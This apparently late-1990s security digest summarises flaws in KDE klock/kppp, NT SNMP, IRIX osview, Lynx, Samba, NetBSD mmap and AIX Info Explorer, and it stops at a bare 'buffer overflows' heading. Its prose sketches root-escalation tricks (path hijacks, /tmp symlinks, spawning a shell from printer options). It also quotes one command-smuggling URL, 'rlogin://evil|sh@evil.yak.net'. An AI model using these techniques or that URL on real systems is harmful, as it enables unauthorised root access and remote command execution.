kde's kppp and klock are a mess
KDE's klock (an xlock equivalent -- not a clock) attempts to run "kblankscrn.kss"
as root (klock is setuid root). If this file isn't found (or isn't
marked executable), klock will search the user's path for a "kblankscrn.kss"
file and run that one as root. Also it trusts certain environment
variables like KDEDIR to point to copies of executables which it will run
as root. kppp has the same flaws.
hpux vacation sends parameters to sendmail
HPUX's "vacation" program accidentally sends certain parameters to
sendmail that could be exploited by a remote user. No further information
was given by HP.
nt's snmp insecure
The default SNMP server for NT (which isn't automatically installed)
puts everything in the "public" community, meaning anyone can read and
write things like your routing table. Only NT 4.04 allows a community
to be set read-only, so the only solution for others is to change the community
name to something secret. Local users on an NT box may be able
to read the community name(s) from your registry if you haven't set the
registry permissions right.
irix osview falls into the /tmp trap
The osview GUI program for IRIX tries to create files in /tmp that
have predictable (in fact, never changing) filenames. It doesn't
check for softlinks or even try to open them exclusively. Anyone
can therefore softlink these files to something like /etc/passwd to corrupt
system files. Apparently this only happens if you run osview from
the chost GUI (not when run from the command line).
lynx rlogin bug
Lynx strips "evil" characters from most things, but forgets to strip
them from the username segment of an rlogin url (such as rlogin://robey@yak.net).
You can set up an evil "rlogind" that just sends commands, and they'll
be executed by anyone going to rlogin://evil|sh@evil.yak.net).
nt named pipes knocked out rpc
Microsoft released a patch for an NT bug where using a named pipe to
talk to an RPC service could cause it to lock up and spin. If
you sent random data to the RPC service over the named pipe, the RPC
service would attempt to close the connection, but somehow get lost and
spin instead. (A named pipe is just a data stream between processes
that uses a filename to identify the connection. At least on unix.
I assume it's the same on NT.)
samba forgot the sticky bit
The samba team announced that they had made two security mistakes in
samba 1.9.18. They accidentally included a prototype program called
'wsmbconf' which had the group-setuid bit on. The file can just be
erased. Also /var/spool/samba was created world-writable,
but didn't have the sticky bit set. This apparently doesn't affect
Redhat distributions because they ship with a beta of 1.9.18.
netbsd was playing loose with mmap
Unix 'mmap' maps a disk file into memory space (roughly translating
memory reads/writes back to the disk). On NetBSD, several device
drivers supported having their device files mapped into memory, but didn't
check the offset parameter, so they accidentally allowed access to pieces
of memory that weren't actually related to a current map. The effects
varied from platform to platform, depending on how well the drivers were
written.
aix "info explorer" bug
AIX comes with an "info explorer" which is basically an online
GUI help system. Part of it uses a unix-domain socket (a special
file that behaves exactly like a network connection between processes on
a single machine). It doesn't do any authentication over this socket,
and assumes that it can trust all info sent to it, so you can use this
socket to ask the "info explorer" to open up a window on your display.
From there you can change the printer options to spawn a shell, and you
have root access.
buffer overflows